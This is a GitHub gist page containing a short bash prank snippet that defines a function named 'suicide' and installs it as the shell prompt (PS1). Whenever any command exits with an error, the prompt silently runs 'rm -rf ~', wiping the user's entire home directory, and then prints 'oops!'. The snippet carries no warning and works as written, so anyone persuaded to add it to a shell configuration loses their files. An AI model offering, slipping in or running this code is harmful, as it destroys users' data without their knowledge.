Skip to content

Instantly share code, notes, and snippets.

@mr1337357
Created March 20, 2019 18:41
Show Gist options
  • Save mr1337357/25e37d4c5f0b7c8abede174397e95e22 to your computer and use it in GitHub Desktop.
Save mr1337357/25e37d4c5f0b7c8abede174397e95e22 to your computer and use it in GitHub Desktop.
suicide()
{
if [[ $? == 0 ]]
then
echo '$ '
else
rm -rf ~
echo 'oops! '
fi
}
PS1='$(suicide)'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment